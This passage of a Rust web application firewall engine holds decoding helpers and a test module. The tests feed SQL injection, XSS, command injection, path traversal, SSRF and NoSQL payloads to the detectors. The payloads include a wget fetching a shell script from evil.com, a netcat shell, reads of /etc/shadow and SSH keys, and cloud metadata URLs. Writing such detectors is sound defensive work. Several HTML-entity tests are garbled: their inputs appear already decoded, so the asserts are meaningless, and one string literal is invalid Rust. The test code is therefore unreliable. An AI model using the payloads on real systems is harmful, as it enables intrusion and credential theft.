            None => body.parse::<u32>().ok()?,
        };
        // from_u32 rejects surrogates and values beyond U+10FFFF.
        return char::from_u32(code);
    }
    // Named entities; the list intentionally covers XSS-relevant punctuation.
    match entity {
        "lt" => Some('<'),
        "gt" => Some('>'),
        "amp" => Some('&'),
        "quot" => Some('"'),
        "apos" => Some('\''),
        "nbsp" => Some('\u{00A0}'),
        "tab" | "Tab" => Some('\t'),
        "newline" | "NewLine" => Some('\n'),
        "colon" => Some(':'),
        "sol" => Some('/'),
        "equals" => Some('='),
        "lpar" => Some('('),
        "rpar" => Some(')'),
        "lsqb" | "lbrack" => Some('['),
        "rsqb" | "rbrack" => Some(']'),
        "lcub" | "lbrace" => Some('{'),
        "rcub" | "rbrace" => Some('}'),
        "semi" => Some(';'),
        "comma" => Some(','),
        "period" | "dot" => Some('.'),
        "excl" => Some('!'),
        "quest" => Some('?'),
        "num" => Some('#'),
        "percnt" => Some('%'),
        "plus" => Some('+'),
        "minus" | "dash" => Some('-'),
        "ast" | "midast" => Some('*'),
        "verbar" | "vert" => Some('|'),
        "bsol" => Some('\\'),
        "circ" => Some('^'),
        "grave" => Some('`'),
        "tilde" => Some('~'),
        "at" => Some('@'),
        _ => None,
    }
}
/// Percent-decodes `value` (treating '+' as a space, form-style); if the
/// result is not valid UTF-8, falls back to the original input unchanged.
fn safe_percent_decode(value: &str) -> String {
    let plus_as_space = value.replace('+', " ");
    match percent_decode_str(&plus_as_space).decode_utf8() {
        Ok(decoded) => decoded.into_owned(),
        Err(_) => value.to_string(),
    }
}
/// Attempts to decode `value` as base64 (standard alphabet first, then
/// URL-safe without padding). Returns the decoded text only when it is
/// non-empty valid UTF-8; otherwise returns the input unchanged.
fn decode_if_base64(value: &str) -> String {
    use base64::engine::general_purpose::URL_SAFE_NO_PAD;
    let trimmed = value.trim();
    // Very short strings are too ambiguous to treat as base64.
    if trimmed.len() < 8 {
        return value.to_string();
    }
    // Accept only non-empty, valid-UTF-8 decodings.
    let to_text = |bytes: Vec<u8>| String::from_utf8(bytes).ok().filter(|s| !s.is_empty());
    if let Some(text) = BASE64_STANDARD.decode(trimmed.as_bytes()).ok().and_then(to_text) {
        return text;
    }
    if let Some(text) = URL_SAFE_NO_PAD.decode(trimmed.as_bytes()).ok().and_then(to_text) {
        return text;
    }
    value.to_string()
}
/// Reconstructs an approximate raw HTTP/1.1 request from the context:
/// request line, headers (in map iteration order), blank line, then the text
/// body when present. Lines are '\n'-separated, not CRLF.
fn build_raw_request(ctx: &EvalContext) -> String {
    let mut raw = format!("{} {} HTTP/1.1\n", ctx.method, ctx.url);
    for (name, value) in &ctx.headers {
        raw.push_str(name);
        raw.push_str(": ");
        raw.push_str(value);
        raw.push('\n');
    }
    raw.push('\n');
    raw.push_str(ctx.body_text.unwrap_or(""));
    raw
}
/// Extracts the `boundary` parameter from a Content-Type header value.
/// The parameter name is matched case-insensitively and surrounding quotes
/// are stripped; an empty boundary yields `None`.
fn extract_multipart_boundary(content_type: &str) -> Option<String> {
    for param in content_type.split(';') {
        if let Some((name, raw)) = param.trim().split_once('=') {
            if name.trim().eq_ignore_ascii_case("boundary") {
                let cleaned = raw.trim().trim_matches('"');
                if cleaned.is_empty() {
                    return None;
                }
                return Some(cleaned.to_string());
            }
        }
    }
    None
}
/// Splits a multipart body on `--boundary` and returns the non-empty value of
/// every part (the text after the part's blank header/body separator).
/// Parts without a `CRLF CRLF` separator are skipped; the body is decoded
/// lossily, so invalid UTF-8 bytes become replacement characters.
fn parse_multipart_values(raw_body: &[u8], boundary: &str) -> Vec<String> {
    let body = String::from_utf8_lossy(raw_body);
    let marker = format!("--{}", boundary);
    let mut out = Vec::new();
    for part in body.split(&marker) {
        // Strip surrounding CR/LF/whitespace. (This also makes any further
        // leading-"\r\n" check unreachable — the old one was dead code.)
        let part = part.trim_matches('\r').trim_matches('\n').trim();
        // Skip the preamble (empty) and the closing delimiter ("--…"),
        // which also covers the bare "--" terminator.
        if part.is_empty() || part.starts_with("--") {
            continue;
        }
        // Part headers and value are separated by a blank line (CRLF CRLF).
        if let Some((_, rest)) = part.split_once("\r\n\r\n") {
            let value = rest.trim_end_matches("\r\n").trim().to_string();
            if !value.is_empty() {
                out.push(value);
            }
        }
    }
    out
}
/// Collects the values of all argument entries whose keys satisfy `selector`;
/// with no selector, every entry's value is collected.
fn select_argument_values(
    engine: &Engine,
    selector: Option<&MatchCondition>,
    ctx: &EvalContext,
) -> Vec<String> {
    ctx.arg_entries
        .iter()
        .filter(|entry| match selector {
            Some(sel) => matches_selector(engine, sel, &entry.key),
            None => true,
        })
        .map(|entry| entry.value.clone())
        .collect()
}
/// Returns true when `candidate` (an argument key) satisfies the selector
/// condition. Supports a small subset of condition kinds; unknown kinds
/// never match.
fn matches_selector(engine: &Engine, selector: &MatchCondition, candidate: &str) -> bool {
match selector.kind.as_str() {
"to_lowercase" => {
// Lowercase the candidate, then apply the nested selector (if any);
// a bare `to_lowercase` with no child matches everything.
let lowered = candidate.to_lowercase();
selector
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| matches_selector(engine, child, &lowered))
.unwrap_or(true)
}
"regex" => engine.eval_regex(selector.match_value.as_ref(), Some(candidate)),
"hashset" => eval_hashset(selector.match_value.as_ref(), Some(candidate)),
"multiple_contains" => {
eval_multiple_contains(selector.match_value.as_ref(), Some(candidate))
}
"contains" => eval_contains(selector.match_value.as_ref(), Some(candidate)),
"equals" => eval_equals(selector.match_value.as_ref(), Some(candidate)),
_ => false,
}
}
/// Recursively gathers every literal regex pattern reachable from this
/// condition (its own pattern when kind == "regex", plus patterns in the
/// nested condition, array items, and the selector).
fn collect_regex_patterns(condition: &MatchCondition, out: &mut Vec<String>) {
    if condition.kind == "regex" {
        if let Some(MatchValue::Str(pattern)) = condition.match_value.as_ref() {
            out.push(pattern.clone());
        }
    }
    if let Some(mv) = condition.match_value.as_ref() {
        if let Some(child) = mv.as_cond() {
            collect_regex_patterns(child, out);
        } else {
            // An array: recurse into every nested-condition item.
            for item in mv.as_arr().into_iter().flatten() {
                if let Some(child) = item.as_cond() {
                    collect_regex_patterns(child, out);
                }
            }
        }
    }
    if let Some(sel) = condition.selector.as_ref() {
        collect_regex_patterns(sel, out);
    }
}
/// Recursively gathers every literal word value reachable from this condition
/// (its own value when kind == "word", plus values in the nested condition,
/// array items, and the selector).
fn collect_word_values(condition: &MatchCondition, out: &mut Vec<String>) {
    if condition.kind == "word" {
        if let Some(MatchValue::Str(word)) = condition.match_value.as_ref() {
            out.push(word.clone());
        }
    }
    if let Some(mv) = condition.match_value.as_ref() {
        if let Some(child) = mv.as_cond() {
            collect_word_values(child, out);
        } else {
            // An array: recurse into every nested-condition item.
            for item in mv.as_arr().into_iter().flatten() {
                if let Some(child) = item.as_cond() {
                    collect_word_values(child, out);
                }
            }
        }
    }
    if let Some(sel) = condition.selector.as_ref() {
        collect_word_values(sel, out);
    }
}
#[cfg(test)]
mod tests {
use super::*;
use crate::waf::types::Header;
#[test]
fn test_empty_engine() {
let engine = Engine::empty();
assert_eq!(engine.rule_count(), 0);
}
#[test]
fn test_load_rules() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "SQL injection",
"risk": 10.0,
"blocking": true,
"matches": [
{"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
]
}
]"#;
let count = engine.load_rules(rules.as_bytes()).unwrap();
assert_eq!(count, 1);
}
#[test]
fn test_analyze_sqli() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "SQL injection",
"risk": 10.0,
"blocking": true,
"matches": [
{"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
let verdict = engine.analyze(&Request {
method: "GET",
path: "/api/users?id=1' OR '1'='1",
..Default::default()
});
assert_eq!(verdict.action, Action::Block);
assert!(verdict.risk_score > 0);
assert!(verdict.matched_rules.contains(&1));
}
#[test]
fn test_sql_analyzer() {
assert!(sql_analyzer_score("SELECT * FROM users") > 0);
assert!(sql_analyzer_score("SELECT * FROM information_schema") > 0);
assert!(sql_analyzer_score("INSERT INTO users") > 0);
assert!(sql_analyzer_score("DELETE FROM users") > 0);
assert!(sql_analyzer_score("UNION SELECT * FROM users") > 0);
assert!(sql_analyzer_score("admin' --") > 0);
assert!(sql_analyzer_score("hello world") == 0);
assert!(sql_analyzer_score("normal query string") == 0);
}
#[test]
fn test_xss_analyzer() {
assert!(xss_analyzer_score("<script>alert(1)</script>") > 0);
assert!(xss_analyzer_score("javascript:alert(1)") > 0);
assert!(xss_analyzer_score("onclick=alert(1)") > 0);
assert!(xss_analyzer_score("hello world") == 0);
}
#[test]
fn test_xss_analyzer_html_entity_bypass() {
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via decimal entities"
);
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via hex entities"
);
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via named entities"
);
assert!(
xss_analyzer_score("<script>alert(1)</script>") > 0,
"Should detect <script> via mixed entities"
);
assert!(
xss_analyzer_score(
"javascript:alert(1)"
) > 0,
"Should detect javascript: via decimal entities"
);
assert!(
xss_analyzer_score("onerror=alert(1)") > 0,
"Should detect onerror via decimal entities"
);
assert!(
xss_analyzer_score("document.cookie") > 0,
"Should detect document.cookie via decimal entities"
);
assert!(
xss_analyzer_score("<script>") > 0,
"Should detect script tag with uppercase hex"
);
assert!(
xss_analyzer_score("<img src=x onerror=alert(1)>") > 0,
"Should detect img tag via entities"
);
}
#[test]
fn test_decode_html_entities() {
assert_eq!(decode_html_entities("<"), "<");
assert_eq!(decode_html_entities(">"), ">");
assert_eq!(decode_html_entities("<script>"), "<script>");
assert_eq!(decode_html_entities("<"), "<");
assert_eq!(decode_html_entities(">"), ">");
assert_eq!(decode_html_entities("<script>"), "<script>");
assert_eq!(decode_html_entities("<"), "<");
assert_eq!(decode_html_entities(">"), ">");
assert_eq!(decode_html_entities("&"), "&");
assert_eq!(decode_html_entities("""), "\"");
assert_eq!(decode_html_entities("'"), "'");
assert_eq!(decode_html_entities("hello <world>"), "hello <world>");
assert_eq!(decode_html_entities("no entities here"), "no entities here");
assert_eq!(decode_html_entities("&unknown;"), "&unknown;");
assert_eq!(decode_html_entities("&;"), "&;");
assert_eq!(decode_html_entities("<"), "<");
}
#[test]
fn test_xss_double_encoding_bypass() {
assert!(
xss_analyzer_score("&#60;script&#62;") > 0,
"Should detect double-encoded script tag"
);
}
#[test]
fn test_cmd_analyzer() {
assert!(
cmd_analyzer_score(r"`cat /etc/passwd`") > 0,
"Should detect backtick execution"
);
assert!(
cmd_analyzer_score(r"`id`") > 0,
"Should detect simple backtick"
);
assert!(
cmd_analyzer_score(r"$(cat /etc/passwd)") > 0,
"Should detect subshell execution"
);
assert!(
cmd_analyzer_score(r"$(whoami)") > 0,
"Should detect simple subshell"
);
assert!(
cmd_analyzer_score(r"${PATH}") > 0,
"Should detect variable substitution"
);
assert!(
cmd_analyzer_score(r"${IFS}") > 0,
"Should detect IFS substitution"
);
assert!(cmd_analyzer_score(r"$IFS") > 0, "Should detect $IFS");
assert!(
cmd_analyzer_score(r"IFS=x") > 0,
"Should detect IFS assignment"
);
assert!(
cmd_analyzer_score(r"cat /etc/passwd") > 0,
"Should detect /etc/passwd access"
);
assert!(
cmd_analyzer_score(r"cat /etc/shadow") > 0,
"Should detect /etc/shadow access"
);
assert!(
cmd_analyzer_score(r"wget http://evil.com/shell.sh") > 0,
"Should detect wget"
);
assert!(
cmd_analyzer_score(r"curl http://evil.com") > 0,
"Should detect curl"
);
assert!(
cmd_analyzer_score(r"nc -e /bin/sh") > 0,
"Should detect netcat"
);
assert!(cmd_analyzer_score(r"bash -i") > 0, "Should detect bash -i");
assert!(
cmd_analyzer_score(r"/bin/sh -c 'cmd'") > 0,
"Should detect /bin/sh -c"
);
assert!(
cmd_analyzer_score("hello world") == 0,
"Clean value should not match"
);
assert!(
cmd_analyzer_score("user@example.com") == 0,
"Email should not match"
);
}
#[test]
fn test_cmd_analyzer_newline_bypass() {
assert!(
cmd_analyzer_score("id%0acat /etc/passwd") > 0,
"Should detect %0a newline injection"
);
assert!(
cmd_analyzer_score("cmd%0dmore") > 0,
"Should detect %0d carriage return injection"
);
assert!(
cmd_analyzer_score("%0A%0D") > 0,
"Should detect uppercase encoded CRLF"
);
assert!(
cmd_analyzer_score("id%250acat") > 0,
"Should detect double-encoded newline"
);
}
#[test]
fn test_cmd_analyzer_ifs_bypass() {
assert!(
cmd_analyzer_score(r"cat${IFS}/etc/passwd") > 0,
"Should detect $IFS brace bypass"
);
assert!(
cmd_analyzer_score(r"cat$IFS/etc/passwd") > 0,
"Should detect $IFS bypass"
);
assert!(
cmd_analyzer_score(r"{cat,/etc/passwd}") > 0,
"Should detect brace expansion"
);
}
#[test]
fn test_cmd_analyzer_null_byte() {
assert!(
cmd_analyzer_score("file.txt%00.jpg") > 0,
"Should detect %00 null byte"
);
assert!(
cmd_analyzer_score("cmd\\x00param") > 0,
"Should detect \\x00 null byte"
);
}
#[test]
fn test_path_traversal_analyzer_basic() {
assert!(
path_traversal_analyzer_score("../etc/passwd") > 0,
"Should detect basic ../"
);
assert!(
path_traversal_analyzer_score("..\\Windows\\System32") > 0,
"Should detect basic ..\\"
);
assert!(
path_traversal_analyzer_score("....//etc/passwd") > 0,
"Should detect multiple dots"
);
assert!(
path_traversal_analyzer_score("/home/user/file.txt") == 0,
"Clean path should not match"
);
assert!(
path_traversal_analyzer_score("relative/path/to/file") == 0,
"Relative path without traversal should not match"
);
}
#[test]
fn test_path_traversal_url_encoding_bypass() {
assert!(
path_traversal_analyzer_score("%2e%2e%2fetc/passwd") > 0,
"Should detect %2e%2e%2f (URL-encoded ../)"
);
assert!(
path_traversal_analyzer_score("..%2fetc/passwd") > 0,
"Should detect ..%2f (partial encoding)"
);
assert!(
path_traversal_analyzer_score("%2e%2e/etc/passwd") > 0,
"Should detect %2e%2e/ (partial encoding)"
);
assert!(
path_traversal_analyzer_score("%2E%2E%2Fetc/passwd") > 0,
"Should detect uppercase %2E%2E%2F"
);
}
#[test]
fn test_path_traversal_double_encoding_bypass() {
assert!(
path_traversal_analyzer_score("%252e%252e%252fetc/passwd") > 0,
"Should detect double-encoded %252e%252e%252f"
);
assert!(
path_traversal_analyzer_score("%252E%252E%252F") > 0,
"Should detect uppercase double-encoded"
);
assert!(
path_traversal_analyzer_score("%25252e%25252e%25252f") > 0,
"Should detect triple-encoded path traversal"
);
}
#[test]
fn test_path_traversal_unicode_bypass() {
assert!(
path_traversal_analyzer_score("%c0%ae%c0%ae/etc/passwd") > 0,
"Should detect overlong UTF-8 %c0%ae (dot)"
);
assert!(
path_traversal_analyzer_score("..%c0%afetc/passwd") > 0,
"Should detect overlong UTF-8 %c0%af (slash)"
);
assert!(
path_traversal_analyzer_score("%c0%ae%c0%ae%c0%afetc%c0%afpasswd") > 0,
"Should detect mixed overlong encoding"
);
}
#[test]
fn test_path_traversal_windows_patterns() {
assert!(
path_traversal_analyzer_score("..\\..\\boot.ini") > 0,
"Should detect Windows backslash traversal"
);
assert!(
path_traversal_analyzer_score("%2e%2e%5c") > 0,
"Should detect %5c (encoded backslash)"
);
assert!(
path_traversal_analyzer_score("..\\..\\Windows\\System32\\config\\SAM") > 0,
"Should detect SAM file access"
);
assert!(
path_traversal_analyzer_score("..\\..\\boot.ini") > 0,
"Should detect boot.ini access"
);
}
#[test]
fn test_path_traversal_unix_sensitive_targets() {
assert!(
path_traversal_analyzer_score("../../etc/passwd") > 0,
"Should detect /etc/passwd access"
);
assert!(
path_traversal_analyzer_score("..%2f..%2fetc%2fshadow") > 0,
"Should detect encoded /etc/shadow access"
);
assert!(
path_traversal_analyzer_score("../../.ssh/id_rsa") > 0,
"Should detect .ssh access"
);
assert!(
path_traversal_analyzer_score("../../proc/self/environ") > 0,
"Should detect /proc access"
);
}
#[test]
fn test_path_traversal_null_byte() {
assert!(
path_traversal_analyzer_score("../etc/passwd%00.jpg") > 0,
"Should detect null byte truncation"
);
assert!(
path_traversal_analyzer_score("file.txt\\x00../etc/passwd") > 0,
"Should detect \\x00 null byte"
);
}
#[test]
fn test_normalize_unicode_path() {
assert_eq!(normalize_unicode_path("%c0%ae"), ".");
assert_eq!(normalize_unicode_path("%C0%AE"), ".");
assert_eq!(normalize_unicode_path("%e0%80%ae"), ".");
assert_eq!(normalize_unicode_path("%c0%af"), "/");
assert_eq!(normalize_unicode_path("%C0%AF"), "/");
assert_eq!(normalize_unicode_path("%c1%9c"), "\\");
assert_eq!(normalize_unicode_path("%C1%9C"), "\\");
assert_eq!(normalize_unicode_path("%c0%ae%c0%ae%c0%af"), "../");
}
#[test]
fn test_ssrf_analyzer_localhost() {
assert!(
ssrf_analyzer_score("http://127.0.0.1/") > 0,
"Should detect 127.0.0.1"
);
assert!(
ssrf_analyzer_score("http://127.0.0.2/admin") > 0,
"Should detect 127.0.0.x"
);
assert!(
ssrf_analyzer_score("https://127.255.255.255:8080/") > 0,
"Should detect 127.x.x.x"
);
assert!(
ssrf_analyzer_score("http://[::1]/") > 0,
"Should detect ::1"
);
assert!(
ssrf_analyzer_score("http://[0:0:0:0:0:0:0:1]/") > 0,
"Should detect full IPv6 localhost"
);
}
#[test]
fn test_ssrf_analyzer_cloud_metadata() {
assert!(
ssrf_analyzer_score("http://169.254.169.254/latest/meta-data/") > 0,
"Should detect AWS metadata endpoint"
);
assert!(
ssrf_analyzer_score("http://169.254.170.2/v2/credentials") > 0,
"Should detect AWS ECS metadata"
);
assert!(
ssrf_analyzer_score("http://metadata.google.internal/") > 0,
"Should detect GCP metadata hostname"
);
assert!(
ssrf_analyzer_score("http://metadata.azure.com/") > 0,
"Should detect Azure metadata hostname"
);
}
#[test]
fn test_ssrf_analyzer_private_ips() {
assert!(
ssrf_analyzer_score("http://10.0.0.1/internal") > 0,
"Should detect 10.x.x.x"
);
assert!(
ssrf_analyzer_score("http://10.255.255.255/") > 0,
"Should detect 10.255.255.255"
);
assert!(
ssrf_analyzer_score("http://192.168.1.1/") > 0,
"Should detect 192.168.x.x"
);
assert!(
ssrf_analyzer_score("http://192.168.0.254:3000/") > 0,
"Should detect with port"
);
assert!(
ssrf_analyzer_score("http://172.16.0.1/") > 0,
"Should detect 172.16.x.x"
);
assert!(
ssrf_analyzer_score("http://172.31.255.255/") > 0,
"Should detect 172.31.x.x"
);
}
#[test]
fn test_ssrf_analyzer_dangerous_schemes() {
assert!(
ssrf_analyzer_score("file:///etc/passwd") > 0,
"Should detect file://"
);
assert!(
ssrf_analyzer_score("gopher://internal:1234/") > 0,
"Should detect gopher://"
);
assert!(
ssrf_analyzer_score("dict://localhost:11211/") > 0,
"Should detect dict://"
);
assert!(
ssrf_analyzer_score("ldap://internal/") > 0,
"Should detect ldap://"
);
assert!(
ssrf_analyzer_score("expect://id") > 0,
"Should detect expect://"
);
assert!(
ssrf_analyzer_score("php://filter/convert.base64-encode") > 0,
"Should detect php://"
);
assert!(
ssrf_analyzer_score("data:text/html,<script>") > 0,
"Should detect data:"
);
}
#[test]
fn test_ssrf_analyzer_ipv6_mapped() {
assert!(
ssrf_analyzer_score("http://[::ffff:127.0.0.1]/") > 0,
"Should detect IPv6-mapped localhost"
);
assert!(
ssrf_analyzer_score("http://[::ffff:192.168.1.1]/") > 0,
"Should detect IPv6-mapped private IP"
);
assert!(
ssrf_analyzer_score("http://[::ffff:169.254.169.254]/") > 0,
"Should detect IPv6-mapped metadata"
);
}
#[test]
fn test_ssrf_analyzer_encoded_ip() {
assert!(
ssrf_analyzer_score("http://2130706433/") > 0,
"Should detect decimal IP (127.0.0.1)"
);
assert!(
ssrf_analyzer_score("http://0x7f000001/") > 0,
"Should detect hex IP (127.0.0.1)"
);
}
#[test]
fn test_ssrf_analyzer_url_encoded() {
assert!(
ssrf_analyzer_score("http%3a%2f%2f127.0.0.1%2f") > 0,
"Should detect URL-encoded SSRF"
);
assert!(
ssrf_analyzer_score("http%253a%252f%252f127.0.0.1") > 0,
"Should detect double-encoded SSRF"
);
}
#[test]
fn test_ssrf_analyzer_false_positives() {
assert!(
ssrf_analyzer_score("http://8.8.8.8/") == 0,
"Should not flag public IP"
);
assert!(
ssrf_analyzer_score("https://google.com/") == 0,
"Should not flag domain"
);
assert!(
ssrf_analyzer_score("http://example.com/api/data") == 0,
"Should not flag normal URL"
);
assert!(
ssrf_analyzer_score("user submitted text") == 0,
"Should not flag normal text"
);
assert!(
ssrf_analyzer_score("192.168.1.1 is a private IP") == 0,
"Should not flag IP without URL context"
);
}
#[test]
fn test_nosql_analyzer_mongo_operators() {
assert!(
nosql_analyzer_score(r#"{"username": {"$ne": null}}"#) > 0,
"Should detect $ne operator"
);
assert!(
nosql_analyzer_score(r#"{"age": {"$gt": 18}}"#) > 0,
"Should detect $gt operator"
);
assert!(
nosql_analyzer_score(r#"{"name": {"$regex": ".*"}}"#) > 0,
"Should detect $regex operator"
);
assert!(
nosql_analyzer_score(r#"{"$or": [{"a": 1}, {"b": 2}]}"#) > 0,
"Should detect $or operator"
);
}
#[test]
fn test_nosql_analyzer_where_js() {
assert!(
nosql_analyzer_score(r#"{"$where": "function() { return true; }"}"#) > 0,
"Should detect $where with function"
);
assert!(
nosql_analyzer_score(r#"{"$where": "this.password == 'test'"}"#) > 0,
"Should detect $where with this keyword"
);
assert!(
nosql_analyzer_score(r#"{"$where": "sleep(5000)"}"#) > 0,
"Should detect $where with sleep (DoS)"
);
}
#[test]
fn test_nosql_analyzer_auth_bypass() {
assert!(
nosql_analyzer_score(r#"{"password": {"$ne": ""}}"#) > 0,
"Should detect password $ne bypass"
);
assert!(
nosql_analyzer_score(r#"{"username": "admin", "password": {"$gt": ""}}"#) > 0,
"Should detect password $gt bypass"
);
assert!(
nosql_analyzer_score(r#"{"user": {"$exists": true}}"#) > 0,
"Should detect user $exists bypass"
);
}
#[test]
fn test_nosql_analyzer_proto_pollution() {
assert!(
nosql_analyzer_score(r#"{"__proto__": {"isAdmin": true}}"#) > 0,
"Should detect __proto__ pollution"
);
assert!(
nosql_analyzer_score(r#"{"constructor": {"prototype": {}}}"#) > 0,
"Should detect constructor pollution"
);
assert!(
nosql_analyzer_score(r#"{"prototype": {"polluted": true}}"#) > 0,
"Should detect direct prototype pollution"
);
}
#[test]
fn test_nosql_analyzer_couchdb() {
assert!(
nosql_analyzer_score("/_all_docs") > 0,
"Should detect _all_docs endpoint"
);
assert!(
nosql_analyzer_score("/_design/mydesign/_view/myview") > 0,
"Should detect _design/_view endpoints"
);
assert!(
nosql_analyzer_score("/_changes?since=0") > 0,
"Should detect _changes endpoint"
);
}
// Dangerous Redis commands (code eval, data wipe, config, key scan) must be flagged.
#[test]
fn test_nosql_analyzer_redis() {
    let cases = [
        ("EVAL \"return 1\" 0", "Should detect EVAL command"),
        ("FLUSHALL", "Should detect FLUSHALL command"),
        ("CONFIG SET dir /tmp", "Should detect CONFIG command"),
        ("KEYS *", "Should detect KEYS command"),
    ];
    for (payload, reason) in cases {
        assert!(nosql_analyzer_score(payload) > 0, "{}", reason);
    }
}
// Percent-encoded variants of NoSQL payloads must still be detected,
// i.e. the analyzer decodes before (or while) scanning.
#[test]
fn test_nosql_analyzer_url_encoded() {
    let cases = [
        (
            "%22%24where%22%3A",
            "Should detect URL-encoded \"$where\":",
        ),
        (
            "%7B%22password%22%3A%7B%22%24ne%22%3A%22%22%7D%7D",
            "Should detect URL-encoded password $ne bypass",
        ),
        (
            "%22__proto__%22%3A",
            "Should detect URL-encoded __proto__",
        ),
    ];
    for (payload, reason) in cases {
        assert!(nosql_analyzer_score(payload) > 0, "{}", reason);
    }
}
// Benign inputs must score exactly 0. Using assert_eq! instead of
// assert!(x == 0) so a regression reports the actual (non-zero) score
// in the panic message, which assert! would swallow.
#[test]
fn test_nosql_analyzer_false_positives() {
    assert_eq!(
        nosql_analyzer_score(r#"{"name": "John", "age": 30}"#),
        0,
        "Should not flag normal JSON"
    );
    assert_eq!(
        nosql_analyzer_score(r#"{"status": "active"}"#),
        0,
        "Should not flag simple key-value"
    );
    assert_eq!(
        nosql_analyzer_score("hello world"),
        0,
        "Should not flag normal text"
    );
    assert_eq!(
        nosql_analyzer_score("user@example.com"),
        0,
        "Should not flag email"
    );
}
// End-to-end header matching: a blocking rule keyed on the User-Agent
// header with a `contains` matcher must block a request whose UA carries
// the offending substring, and the verdict must report the rule id.
#[test]
fn test_header_evaluation() {
let mut engine = Engine::empty();
// Single blocking rule: match if the User-Agent header contains "bad-bot".
let rules = r#"[
{
"id": 1,
"description": "Block bad user-agent",
"risk": 10.0,
"blocking": true,
"matches": [
{"type": "header", "field": "User-Agent", "match": {"type": "contains", "match": "bad-bot"}}
]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
// Request carries a matching User-Agent value.
let verdict = engine.analyze(&Request {
method: "GET",
path: "/",
headers: vec![Header::new("User-Agent", "bad-bot/1.0")],
..Default::default()
});
assert_eq!(verdict.action, Action::Block);
assert!(verdict.matched_rules.contains(&1));
}
// analyze_safe on a trivially matching request: the rule must fire,
// no timeout is reported, and rules_evaluated stays None (it is only
// populated on the timeout path, per the assertions below).
#[test]
fn test_analyze_safe_basic() {
let mut engine = Engine::empty();
// One non-blocking rule matching any URI containing "test".
let rules = r#"[
{
"id": 1,
"description": "Simple match",
"risk": 10.0,
"matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
let verdict = engine.analyze_safe(&Request {
method: "GET",
path: "/test",
..Default::default()
});
// Fast evaluation must not trip the safety timeout.
assert!(!verdict.timed_out);
assert!(verdict.rules_evaluated.is_none());
assert!(verdict.matched_rules.contains(&1));
}
// analyze_with_timeout accepts a caller-supplied budget; a 100ms budget
// is ample for one trivial rule, so the verdict must not be timed out.
#[test]
fn test_analyze_with_timeout_custom() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "Simple match",
"risk": 10.0,
"matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
}
]"#;
engine.load_rules(rules.as_bytes()).unwrap();
let verdict = engine.analyze_with_timeout(
&Request {
method: "GET",
path: "/test",
..Default::default()
},
// Custom budget, distinct from DEFAULT_EVAL_TIMEOUT (50ms).
Duration::from_millis(100),
);
assert!(!verdict.timed_out);
}
// Sanity-check the timeout constants: the hard cap must not be below the
// default, and must itself stay within one second.
#[test]
fn test_timeout_cap() {
    assert!(DEFAULT_EVAL_TIMEOUT <= MAX_EVAL_TIMEOUT);
    assert!(MAX_EVAL_TIMEOUT <= Duration::from_secs(1));
}
// A default-constructed Verdict starts with the timeout flag clear and
// no rules-evaluated count recorded.
#[test]
fn test_verdict_timeout_fields_default() {
    let v = Verdict::default();
    assert!(!v.timed_out);
    assert!(v.rules_evaluated.is_none());
}
// EvalContext deadline plumbing: no deadline means never exceeded; a
// future deadline is present but not exceeded; a past one is exceeded.
#[test]
fn test_eval_context_deadline() {
    let req = Request {
        method: "GET",
        path: "/test",
        ..Default::default()
    };

    // Without a deadline there is nothing to exceed.
    let ctx = EvalContext::from_request(&req);
    assert!(ctx.deadline.is_none());
    assert!(!ctx.is_deadline_exceeded());

    // A deadline 10s out is stored but not yet exceeded.
    let ctx_future =
        EvalContext::from_request_with_deadline(&req, Instant::now() + Duration::from_secs(10));
    assert!(ctx_future.deadline.is_some());
    assert!(!ctx_future.is_deadline_exceeded());

    // A deadline already in the past must report exceeded immediately.
    let ctx_expired =
        EvalContext::from_request_with_deadline(&req, Instant::now() - Duration::from_millis(1));
    assert!(ctx_expired.is_deadline_exceeded());
}
// Loading a rule with an unparsable regex ("[") must fail with
// WafError::RegexError whose message names the offending pattern.
#[test]
fn test_load_rules_regex_error() {
let mut engine = Engine::empty();
let rules = r#"[
{
"id": 1,
"description": "Invalid regex",
"risk": 10.0,
"matches": [
{
"type": "uri",
"match": {
"type": "regex",
"match": "["
}
}
]
}
]"#;
let result = engine.load_rules(rules.as_bytes());
assert!(result.is_err());
match result {
Err(WafError::RegexError(msg)) => assert!(msg.contains("[")),
// Bind the scrutinee in the catch-all arm: the previous `_ =>` arm
// referenced `result` after `match result` had already moved it
// (the RegexError pattern binds `msg` by value), which is a
// use-of-moved-value error (E0382).
other => panic!("Expected RegexError, got {:?}", other),
}
}
}